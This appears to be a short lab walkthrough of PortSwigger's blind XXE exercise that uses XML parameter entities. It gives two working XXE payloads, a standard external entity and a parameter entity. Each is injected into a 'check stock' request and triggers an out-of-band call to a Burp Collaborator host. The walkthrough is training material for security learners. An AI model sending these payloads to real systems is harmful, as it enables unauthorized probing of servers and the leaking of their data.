Blind XXE with out-of-band interaction via XML parameter entities

Exploitation

the lab has a "check stock" feature that parses XML input

send to repeater

the portswigger labs doesn't allow third partie servers so we have to use collaborator urls instead

so the website is restricting the use of Entities.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://nmdveqrftmnnpfdt98ohgdez9qfi38rx.oastify.com"> ]>
<stockCheck><productId>&xxe</productId><storeId>1</storeId></stockCheck>

let's use parameter entities and try if it will work

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://7gof8alzn6h7jz7d3si1ax8j3a94xulj.oastify.com"> %xxe; ]>
<stockCheck><productId>7</productId><storeId>1</storeId></stockCheck>

hope you found this walkthrough easy to understand and follow

Greeting From Sayonara

PreviousBlind XXE with out-of-band interaction NextExploiting blind XXE to exfiltrate data using a malicious external DTD

Last updated 2 years ago

Was this helpful?